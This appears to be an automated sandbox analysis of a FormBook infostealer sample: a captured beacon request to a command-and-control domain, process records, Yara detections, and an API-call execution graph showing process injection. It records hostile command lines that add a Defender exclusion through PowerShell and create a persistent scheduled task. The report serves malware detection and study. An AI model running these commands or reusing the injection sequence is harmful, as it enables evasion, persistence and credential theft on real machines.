                                      Jun 10, 2024 10:24:15.334767103 CEST463OUTGET /wzcd/?kH=00U8ENLHk&TTv82Lg=FQzs5Gm41lAoc3qf/wWkUZspwwlJHXnDtyrZ3MD2xwlMLvR0+259MhI7Qpdm6NFMCSb0/6QDX0X/DlKTMMPY62KD9eqkA6d10wTN4I0Oir4qL663QSRv2YyvDfJ8itAe1g== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lunareafurniture.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:24:15.937398911 CEST991INHTTP/1.1 301 Moved Permanently
                                      Date: Mon, 10 Jun 2024 08:24:15 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Mon, 10 Jun 2024 09:24:15 GMT
                                      Location: https://www.lunareafurniture.com/wzcd/?kH=00U8ENLHk&TTv82Lg=FQzs5Gm41lAoc3qf/wWkUZspwwlJHXnDtyrZ3MD2xwlMLvR0+259MhI7Qpdm6NFMCSb0/6QDX0X/DlKTMMPY62KD9eqkA6d10wTN4I0Oir4qL663QSRv2YyvDfJ8itAe1g==
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oo6f34OOvsIkW%2Fd5KEC60ZqOj%2FoXU85YBYgdv7so2uriV7w6rgTV89w5FMVOvbQCRGfTlBnfXqXyafnccAoJ7PkZ212cZWOlHAtJIW3raGKei7G6NvpWfDbIDsaYXdl1AOUpMU0it0ozIxg%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8917f6cb29812c8e-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:04:20:01
                                      Start date:10/06/2024
                                      Path:C:\Users\user\Desktop\CFV20240600121.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\CFV20240600121.exe"
                                      Imagebase:0xec0000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:04:20:02
                                      Start date:10/06/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe"
                                      Imagebase:0x4d0000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:04:20:02
                                      Start date:10/06/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:04:20:03
                                      Start date:10/06/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
                                      Imagebase:0x4d0000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:04:20:03
                                      Start date:10/06/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:04:20:03
                                      Start date:10/06/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp"
                                      Imagebase:0x740000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:04:20:03
                                      Start date:10/06/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:04:20:04
                                      Start date:10/06/2024
                                      Path:C:\Users\user\Desktop\CFV20240600121.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\CFV20240600121.exe"
                                      Imagebase:0x440000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:04:20:04
                                      Start date:10/06/2024
                                      Path:C:\Users\user\Desktop\CFV20240600121.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\CFV20240600121.exe"
                                      Imagebase:0x290000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:04:20:04
                                      Start date:10/06/2024
                                      Path:C:\Users\user\Desktop\CFV20240600121.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\CFV20240600121.exe"
                                      Imagebase:0x120000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:04:20:04
                                      Start date:10/06/2024
                                      Path:C:\Users\user\Desktop\CFV20240600121.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\CFV20240600121.exe"
                                      Imagebase:0x740000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:04:20:06
                                      Start date:10/06/2024
                                      Path:C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      Imagebase:0x480000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 29%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:04:20:07
                                      Start date:10/06/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff6ef0c0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:04:20:10
                                      Start date:10/06/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp"
                                      Imagebase:0x740000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:04:20:10
                                      Start date:10/06/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:04:20:11
                                      Start date:10/06/2024
                                      Path:C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
                                      Imagebase:0x70000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:04:20:11
                                      Start date:10/06/2024
                                      Path:C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
                                      Imagebase:0x650000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:04:20:26
                                      Start date:10/06/2024
                                      Path:C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe"
                                      Imagebase:0x870000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:21
                                      Start time:04:20:28
                                      Start date:10/06/2024
                                      Path:C:\Windows\SysWOW64\write.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\write.exe"
                                      Imagebase:0x600000
                                      File size:10'240 bytes
                                      MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      Reputation:moderate
                                      Has exited:false

                                      General

                                      Target ID:22
                                      Start time:04:20:41
                                      Start date:10/06/2024
                                      Path:C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe"
                                      Imagebase:0x870000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:25
                                      Start time:04:20:52
                                      Start date:10/06/2024
                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                      Imagebase:0x7ff79f9e0000
                                      File size:676'768 bytes
                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:10.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:1.4%
                                        Total number of Nodes:214
                                        Total number of Limit Nodes:9
                                        execution_graph 48386 58071b0 48387 58071b1 48386->48387 48390 5807064 48387->48390 48389 5807294 48391 580706f 48390->48391 48394 5807bec 48391->48394 48393 5808039 48393->48389 48395 5807bf7 48394->48395 48398 5807c54 48395->48398 48399 5807c5f 48398->48399 48400 58080c5 48399->48400 48402 5807c64 48399->48402 48400->48393 48403 5808270 OleInitialize 48402->48403 48405 58082d4 48403->48405 48405->48400 48364 5804293 48365 580429c 48364->48365 48366 5804302 48365->48366 48367 58043ac 48365->48367 48368 580435a CallWindowProcW 48366->48368 48370 5804309 48366->48370 48371 580113c 48367->48371 48368->48370 48372 5801147 48371->48372 48374 5802c69 48372->48374 48375 5801264 CallWindowProcW 48372->48375 48375->48374 48320 56f4668 48321 56f4669 48320->48321 48322 56f468b 48321->48322 48324 56f4798 48321->48324 48325 56f479c 48324->48325 48329 56f48a8 48325->48329 48333 56f4898 48325->48333 48331 56f48a9 48329->48331 48330 56f49ac 48330->48330 48331->48330 48337 56f4528 48331->48337 48334 56f489c 48333->48334 48335 56f4528 CreateActCtxA 48334->48335 48336 56f49ac 48334->48336 48335->48336 48338 56f5d38 CreateActCtxA 48337->48338 48340 56f5dfb 48338->48340 48340->48340 48341 a13fad8 48342 a13fc63 48341->48342 48344 a13fafe 48341->48344 48344->48342 48345 a13dfa0 48344->48345 48346 a13fd58 PostMessageW 48345->48346 48347 a13fdc4 48346->48347 48347->48344 48376 177d01c 48377 177d034 48376->48377 48378 177d08e 48377->48378 48380 580113c CallWindowProcW 48377->48380 48381 5802c09 48377->48381 48380->48378 48383 5802c07 48381->48383 48383->48381 48384 5802c69 48383->48384 48385 5801264 CallWindowProcW 48383->48385 48385->48384 48406 a13bee8 48407 a13beee 48406->48407 48412 a13e850 48407->48412 48427 a13e8be 48407->48427 48443 a13e860 48407->48443 48408 a13bef9 48413 a13e87a 48412->48413 48425 a13e89e 48413->48425 48458 a13f2db 48413->48458 48463 a13ecf7 48413->48463 48469 a13f017 48413->48469 48473 a13eea8 48413->48473 48477 a13efc5 48413->48477 48481 a13f146 48413->48481 48487 a13eca1 48413->48487 48491 a13eda2 48413->48491 48497 a13ef43 48413->48497 48501 a13f09c 48413->48501 48505 a13ee3d 48413->48505 48510 a13eddf 48413->48510 48425->48408 48428 a13e84c 48427->48428 48430 a13e8c1 48427->48430 48429 a13e89e 48428->48429 48431 a13f017 3 API calls 48428->48431 48432 a13ecf7 4 API calls 48428->48432 48433 a13f2db 2 API calls 48428->48433 48434 a13eddf 2 API calls 48428->48434 48435 a13ee3d 2 API calls 48428->48435 48436 a13f09c 2 API calls 48428->48436 48437 a13ef43 2 API calls 48428->48437 48438 a13eda2 4 API calls 48428->48438 48439 a13eca1 2 API calls 48428->48439 48440 a13f146 4 API calls 48428->48440 48441 a13efc5 3 API calls 48428->48441 48442 a13eea8 2 API calls 48428->48442 48429->48408 48430->48408 48431->48429 48432->48429 48433->48429 48434->48429 48435->48429 48436->48429 48437->48429 48438->48429 48439->48429 48440->48429 48441->48429 48442->48429 48444 a13e87a 48443->48444 48445 a13f017 3 API calls 48444->48445 48446 a13ecf7 4 API calls 48444->48446 48447 a13e89e 48444->48447 48448 a13f2db 2 API calls 48444->48448 48449 a13eddf 2 API calls 48444->48449 48450 a13ee3d 2 API calls 48444->48450 48451 a13f09c 2 API calls 48444->48451 48452 a13ef43 2 API calls 48444->48452 48453 a13eda2 4 API calls 48444->48453 48454 a13eca1 2 API calls 48444->48454 48455 a13f146 4 API calls 48444->48455 48456 a13efc5 3 API calls 48444->48456 48457 a13eea8 2 API calls 48444->48457 48445->48447 48446->48447 48447->48408 48448->48447 48449->48447 48450->48447 48451->48447 48452->48447 48453->48447 48454->48447 48455->48447 48456->48447 48457->48447 48459 a13edfd 48458->48459 48460 a13ee1e 48458->48460 48515 a13b612 48459->48515 48519 a13b618 48459->48519 48460->48425 48464 a13ed00 48463->48464 48523 a13b3d0 48464->48523 48527 a13b478 48464->48527 48534 a13b3c8 48464->48534 48465 a13f63e 48472 a13b478 2 API calls 48469->48472 48539 a13b480 48469->48539 48470 a13f031 48470->48425 48472->48470 48475 a13b612 WriteProcessMemory 48473->48475 48476 a13b618 WriteProcessMemory 48473->48476 48474 a13eda3 48474->48425 48475->48474 48476->48474 48479 a13b480 Wow64SetThreadContext 48477->48479 48480 a13b478 2 API calls 48477->48480 48478 a13efe4 48479->48478 48480->48478 48483 a13ed00 48481->48483 48482 a13f63e 48484 a13b3d0 ResumeThread 48483->48484 48485 a13b3c8 ResumeThread 48483->48485 48486 a13b478 2 API calls 48483->48486 48484->48482 48485->48482 48486->48482 48543 a13b8a0 48487->48543 48547 a13b894 48487->48547 48492 a13edbb 48491->48492 48494 a13b3d0 ResumeThread 48492->48494 48495 a13b3c8 ResumeThread 48492->48495 48496 a13b478 2 API calls 48492->48496 48493 a13f63e 48494->48493 48495->48493 48496->48493 48551 a13b702 48497->48551 48555 a13b708 48497->48555 48498 a13ef65 48498->48425 48559 a13b550 48501->48559 48563 a13b558 48501->48563 48502 a13f0bd 48506 a13ee46 48505->48506 48508 a13b612 WriteProcessMemory 48506->48508 48509 a13b618 WriteProcessMemory 48506->48509 48507 a13f11c 48507->48425 48508->48507 48509->48507 48511 a13ede5 48510->48511 48513 a13b612 WriteProcessMemory 48511->48513 48514 a13b618 WriteProcessMemory 48511->48514 48512 a13ee1e 48512->48425 48513->48512 48514->48512 48516 a13b660 WriteProcessMemory 48515->48516 48518 a13b6b7 48516->48518 48518->48460 48520 a13b660 WriteProcessMemory 48519->48520 48522 a13b6b7 48520->48522 48522->48460 48524 a13b410 ResumeThread 48523->48524 48526 a13b441 48524->48526 48526->48465 48528 a13b47e Wow64SetThreadContext 48527->48528 48529 a13b3c3 ResumeThread 48527->48529 48531 a13b50d 48528->48531 48533 a13b441 48529->48533 48531->48465 48533->48465 48535 a13b3ce ResumeThread 48534->48535 48536 a13b35d 48534->48536 48538 a13b441 48535->48538 48536->48465 48538->48465 48540 a13b4c5 Wow64SetThreadContext 48539->48540 48542 a13b50d 48540->48542 48542->48470 48544 a13b929 48543->48544 48544->48544 48545 a13ba8e CreateProcessA 48544->48545 48546 a13baeb 48545->48546 48548 a13b929 48547->48548 48548->48548 48549 a13ba8e CreateProcessA 48548->48549 48550 a13baeb 48549->48550 48552 a13b753 ReadProcessMemory 48551->48552 48554 a13b797 48552->48554 48554->48498 48556 a13b753 ReadProcessMemory 48555->48556 48558 a13b797 48556->48558 48558->48498 48560 a13b598 VirtualAllocEx 48559->48560 48562 a13b5d5 48560->48562 48562->48502 48564 a13b598 VirtualAllocEx 48563->48564 48566 a13b5d5 48564->48566 48566->48502 48348 56fd320 48349 56fd321 48348->48349 48353 56fd500 48349->48353 48357 56fd4f3 48349->48357 48350 56fd453 48354 56fd501 48353->48354 48361 56faf74 48354->48361 48358 56fd4fc 48357->48358 48359 56faf74 DuplicateHandle 48358->48359 48360 56fd52e 48359->48360 48360->48350 48362 56fd568 DuplicateHandle 48361->48362 48363 56fd52e 48362->48363 48363->48350 48567 56faf90 48568 56faf91 48567->48568 48569 56faf9f 48568->48569 48572 56fb088 48568->48572 48580 56fb077 48568->48580 48573 56fb089 48572->48573 48574 56fb0bc 48573->48574 48588 56fb313 48573->48588 48592 56fb320 48573->48592 48574->48569 48575 56fb0b4 48575->48574 48576 56fb2c0 GetModuleHandleW 48575->48576 48577 56fb2ed 48576->48577 48577->48569 48581 56fb07c 48580->48581 48582 56fb0bc 48581->48582 48586 56fb313 LoadLibraryExW 48581->48586 48587 56fb320 LoadLibraryExW 48581->48587 48582->48569 48583 56fb0b4 48583->48582 48584 56fb2c0 GetModuleHandleW 48583->48584 48585 56fb2ed 48584->48585 48585->48569 48586->48583 48587->48583 48589 56fb31c 48588->48589 48590 56fb359 48589->48590 48596 56fad98 48589->48596 48590->48575 48594 56fb321 48592->48594 48593 56fb359 48593->48575 48594->48593 48595 56fad98 LoadLibraryExW 48594->48595 48595->48593 48597 56fb500 LoadLibraryExW 48596->48597 48599 56fb579 48597->48599 48599->48590

                                        Executed Functions

                                        Function 077D98C8 Relevance: 6.7, Strings: 5, Instructions: 492COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 602 77d98c8-77d98ca 603 77d98cc-77d98ce 602->603 604 77d98d3-77d98d4 602->604 605 77d98d7-77d9903 603->605 606 77d98d0-77d98d1 603->606 604->605 607 77d990a-77d9953 605->607 608 77d9905 605->608 606->604 715 77d9958 call 77da150 607->715 716 77d9958 call 77da140 607->716 608->607 609 77d995e 610 77d995f 609->610 611 77d9966-77d9982 610->611 612 77d998b-77d998c 611->612 613 77d9984 611->613 619 77d99b7-77d99e3 612->619 613->610 613->612 614 77d9a3d-77d9a6d 613->614 615 77d9b3d-77d9b4e 613->615 616 77d9abd-77d9ad0 613->616 617 77d9d3c 613->617 618 77d9afb-77d9b04 613->618 613->619 620 77d9bf3-77d9c06 613->620 621 77d9a72-77d9a8a 613->621 622 77d9cb2 613->622 623 77d9a28-77d9a3b 613->623 624 77d99e4 613->624 625 77d9d27-77d9d3a 613->625 626 77d9c62 613->626 627 77d9cdb 613->627 628 77d9c91-77d9cb0 613->628 629 77d9a13-77d9a26 613->629 630 77d9ad2-77d9af9 613->630 631 77d998e 613->631 632 77d9c0b-77d9c16 613->632 633 77d9a8b 613->633 634 77d9d0a-77d9d25 613->634 635 77d9b06-77d9b0a 613->635 636 77d9b81-77d9b93 613->636 637 77d9c42-77d9c60 613->637 638 77d99eb-77d9a07 614->638 646 77d9b61-77d9b68 615->646 647 77d9b50-77d9b5f 615->647 639 77d9a92-77d9aae 616->639 643 77d9d57 617->643 618->639 619->624 620->639 621->633 622->627 623->638 624->638 642 77d9ce2-77d9cfe 625->642 641 77d9c69-77d9c85 626->641 627->642 628->641 629->638 630->639 720 77d998e call 77da190 631->720 721 77d998e call 77da180 631->721 717 77d9c19 call 77dad10 632->717 718 77d9c19 call 77dad00 632->718 633->639 634->642 644 77d9b1d-77d9b24 635->644 645 77d9b0c-77d9b1b 635->645 722 77d9b99 call 77dae00 636->722 723 77d9b99 call 77dadf0 636->723 637->622 637->626 666 77d9a09 638->666 667 77d9a10-77d9a11 638->667 651 77d9ab7-77d9ab8 639->651 652 77d9ab0 639->652 653 77d9c8e-77d9c8f 641->653 654 77d9c87 641->654 655 77d9d07-77d9d08 642->655 656 77d9d00 642->656 665 77d9d5e-77d9d7a 643->665 660 77d9b2b-77d9b38 644->660 645->660 662 77d9b6f-77d9b7c 646->662 647->662 649 77d9c1f-77d9c3d 649->639 651->637 652->615 652->616 652->617 652->618 652->620 652->622 652->625 652->626 652->627 652->628 652->630 652->632 652->633 652->634 652->635 652->636 652->637 652->651 653->622 654->617 654->622 654->625 654->626 654->627 654->628 654->634 654->643 654->653 668 77d9ebf-77d9f36 call 77de058 654->668 669 77d9e9e 654->669 670 77d9f93-77d9f99 call 77df5d8 654->670 671 77d9d92-77d9e6f call a130db0 call a1319b0 call 77de058 654->671 672 77d9fc5-77d9fd3 654->672 655->617 655->634 656->617 656->625 656->627 656->634 656->643 656->668 656->669 656->670 656->671 656->672 673 77da099 656->673 660->639 661 77d9994-77d99b5 661->611 662->639 674 77d9d8c-77d9d8d 665->674 675 77d9d7c 665->675 666->614 666->615 666->616 666->617 666->618 666->620 666->621 666->622 666->623 666->624 666->625 666->626 666->627 666->628 666->629 666->630 666->632 666->633 666->634 666->635 666->636 666->637 666->667 667->621 695 77d9f3c-77d9f49 668->695 729 77d9ea1 call a1325d8 669->729 730 77d9ea1 call a1325c8 669->730 679 77d9f9f-77d9fc0 670->679 727 77d9e72 call 77dae00 671->727 728 77d9e72 call 77dadf0 671->728 680 77d9fde-77da04f 672->680 731 77da09b call a13fa98 673->731 732 77da09b call a13fa88 673->732 674->671 674->673 675->643 675->668 675->669 675->670 675->671 675->672 